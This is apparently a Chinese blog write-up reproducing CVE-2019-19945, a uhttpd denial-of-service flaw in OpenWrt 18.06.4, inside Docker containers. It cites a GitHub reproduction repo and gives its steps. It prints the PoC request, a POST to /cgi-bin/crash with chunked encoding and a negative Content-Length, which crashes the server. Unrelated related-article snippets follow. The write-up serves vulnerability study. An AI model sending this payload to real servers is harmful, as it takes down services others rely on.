CVE-2019-19945漏洞复现 Openwrt针对uhttpd漏洞利用

ops/2024/9/25 18:36:07/

根据官方漏洞的文档,该漏洞的复现工作我会基于openwrt的18.06.4这个版本进行测试。我选取的环境是渗透测试常用的kali-Linux系统,然后在其中搭建docker环境来完成相应的实验环境的部署。我通过这个核心命令获取docker环境:

sudo docker import  https://archive.openwrt.org/releases/18.06.4/targets/x86/generic/openwrt-18.06.4-x86-generic-generic-rootfs.tar.gz openwrt-x86-generic-18.06.4-rootfsq

部署完毕后结果如下:

接下来按照要求创建相应的容器获得控制,如下:

之后我们按照要求一步步的搭建漏洞的环境,uhttpd进行测试,具体测试如下:

但是发现根据相应的方法并没有什么效果,可能是这个docker环境比较简陋,不能满足复现所需要的环境要求。所以选择更换别的方法进行复现。

首先对Server端进行了部署的操作,具体部署如下:

最终配置服务端部署完毕结果如下:

然后我们启动服务器即可,如下:

检查docker进程并且查看服务器端的IP地址:

可以发现 web服务成功启动了

接下来设置相应的客户端进行复现:server_ip填写刚才的服务器容器的ip地址

之后我们也启动客户端的环境:

我们可以看下目前处于启动状态的docker环境 为

接下来我们基于客户端 来利用poc对server进行攻击测试

接下来我们测试服务器端的效果

网页已经出现错误了

相应的docker也出现了中断的情况

复现成功!

漏洞复现的参考链接:

并未成功:

https://xz.aliyun.com/t/9041?time__1311=n4%2BxuDgD9DyAeAKD%3DDODlxG2b7eg4xD5Qq3QYx&alichlgref=https%3A%2F%2Fwww.baidu.com%2Flink%3Furl%3DNM5mJ6h4u8mxmZVo4EwUoET8EDe5-xsp_sudEfQD2CgHbu6XyzKawXqREAot5Eoy%26wd%3D%26eqid%3Df12ef11d000288aa0000000466385cc7

成功的复现参考地址:

https://github.com/delicateByte/CVE-2019-19945_Test

具体的复现思路

This is the code for the first Proposed CVE

  1. Install Docker

  2. Build & RUN Servercd Server docker build -t server/cve .docker run -d --name server -p 80:80 server/cve

  3. Get Server Container IPLinuxsudo docker container inspect server | grep -i IPAddressWindows Powershelldocker container inspect server | Select-String "IPAddress"Extract IP and add it to Command for building the ClientYou can check the server by going to localhost:80 in your browser

  4. Build & Run Clientby uncommenting the CMD in the Client/Dockerfile the attack will automatically start with the start of the containercd ../Client/docker build --build-arg server_ip=<SERVER_IP> -t client/cve .docker run -d -p 8080:8080 client/cve

  5. Attach to CLient Docker docker container lsfind client/cve container && attachdocker exec -it <ContainerID> /bin/sh

  6. When Ready Launch Attack ./crash.sh

  7. Server will be unable to respond

POC内容:

POST /cgi-bin/crash HTTP/1.0Transfer-Encoding: chunkedContent-Length: -100000  

持续更新!接下来会逐步展示该漏洞的形成原理!


http://www.ppmy.cn/ops/35867.html

相关文章

1W 3KVDC 隔离双输出 DC/DC 电源模块 ——TPD 系列

TPD系列提供双独立输出电压&#xff0c;并且两组电压可以不同&#xff0c;这样就节省一个电源模块&#xff0c;特别适合一块板上有多个不同电压要求的设计&#xff0c;而外形尺寸和TPA一样&#xff0c;工作温度范围广-40℃到 105℃。

Android 蓝牙实战——蓝牙音乐播放进度(二十)

对于蓝牙音乐的开发来说&#xff0c;播放进度是一个比较重要的数据参数&#xff0c;这里我们就来分析一下蓝牙音乐播放进度的相关回调。 一、回调流程 1、AvrcpControllerService 源码位置&#xff1a;/packages/apps/Bluetooth/src/com/android/bluetooth/avrcpcontroller/…

5个好用AI绘画工具,让你秒变艺术家!

AI绘画现在可谓是相当火爆&#xff0c;各种AI绘画工具如雨后春笋般涌出。很多人想自己尝试用AI来创作&#xff0c;却不知道使用什么工具&#xff0c;今天就给大家分享5个好用AI绘画工具&#xff0c;有的只需一段文字便可生成一幅美轮美奂的大作&#xff0c;让你秒变艺术家&…

四化智造MES(WEB)对接打通金蝶云星空余料入库查询(入库记录查询)接口与生产退料单新增接口

四化智造MES&#xff08;WEB&#xff09;对接打通金蝶云星空余料入库查询&#xff08;入库记录查询&#xff09;接口与生产退料单新增接口 接通系统&#xff1a;四化智造MES&#xff08;WEB&#xff09; “MES助力智能制造过程控制:MES管理生产订单的整个生产流程,通过对生产过…

Leetcode 第396场周赛 问题和解法

问题 有效单词 有效单词需要满足以下几个条件&#xff1a; 至少包含3个字符。 由数字0-9和英文大小写字母组成。&#xff08;不必包含所有这类字符。&#xff09; 至少包含一个元音字母。 至少包含一个辅音字母。 给你一个字符串word。如果word是一个有效单词&#xff0c;则…

如何查看MySQL是32位还是64位

如何查看mysql是多少位 - MySQL数据库 - 亿速云 (yisu.com) 进入MySQL的安装路径的bin目录下 C:\Program Files\MySQL\MySQL Server 8.0\bin>mysql -V mysql Ver 8.0.35 for Win64 on x86_64 (MySQL Community Server - GPL) 可以看出&#xff0c;我的是64位的。

五一反向旅游,景区“AI+视频监控”将持续助力旅游业发展

一、建设背景 每年五一劳动节出去旅游都是人挤人状态&#xff0c;这导致景区的体验感极差。今年“五一反向旅游”的话题冲上了热搜&#xff0c;好多人选择了五一之后再出去旅游&#xff0c;避开拥挤的人群&#xff0c;这个时候景区的监管力度和感知能力就更要跟上去&#xff0…

IP可以使用SSL证书吗,如何部署安装

在当今数字化的世界中&#xff0c;网络安全已经成为每个在线企业不可或缺的一部分。随着越来越多的交易和数据交换在网络上进行&#xff0c;保护这些信息的安全就显得尤为重要。SSL证书&#xff0c;全称为安全套接层数字证书&#xff0c;是保障网站安全的关键技术之一。它通过为…